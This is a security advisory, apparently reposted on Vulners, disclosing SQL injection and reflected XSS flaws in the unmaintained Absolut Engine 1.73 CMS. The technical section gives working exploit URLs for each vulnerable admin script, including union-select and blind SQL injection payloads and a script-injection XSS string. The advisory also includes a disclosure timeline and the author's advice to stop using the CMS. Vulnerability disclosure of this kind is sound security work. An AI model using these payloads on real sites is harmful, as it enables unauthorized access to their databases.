Vulners
Lucene search
Absolut Engine 1.73 - Multiple Vulnerabilities
Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS
Author: Steffen Rösemann
Affected Software: CMS Absolut Engine v. 1.73
Vendor URL: http://www.absolutengine.com/
Vendor Status: solved
CVE-ID: -
==========================
Vulnerability Description:
==========================
The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL
injection vulnerabilities and a XSS vulnerability in its administrative
backend.
==================
Technical Details:
==================
The following PHP-Scripts are prone to SQL injections:
*managersection.php (via sectionID parameter):*
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1*
*Exploit Example:*
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*
*edituser.php (via userID parameter):*
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*
*Exploit Example:*
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*
*admin.php (via username parameter, BlindSQLInjection):*
*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
*Exploit Example:*
*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
*managerrelated.php (via title parameter):*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title
<http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*
*Exploit Example:*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*
The last PHP-Script is as well vulnerable to a Reflecting XSS
vulnerability.
*Exploit Example:*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*
Although this is a product which is not actively developed anymore, I
think it is worth mentioning as the idea (of the lists) are to keep
tracking (unknown) vulnerabilities in software products (but that is a
personally point of view).
Moreover, this product is still in use by some sites (!) and it is offered
without a hint of its status.
=========
Solution:
=========
As the CMS is not actively developed, it shouldn't be used anymore.
====================
Disclosure Timeline:
====================
29-Dec-2014 – found the vulnerability
29-Dec-2014 - informed the developers
29-Dec-2014 – release date of this security advisory [without technical
details]
30-Dec-2014 – Vendor responded, won't patch vulnerabilities
30-Dec-2014 – release date of this security advisory
30-Dec-2014 – post on FullDisclosure
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jan 2015 00:00Current
7.9High risk
Vulners AI Score7.9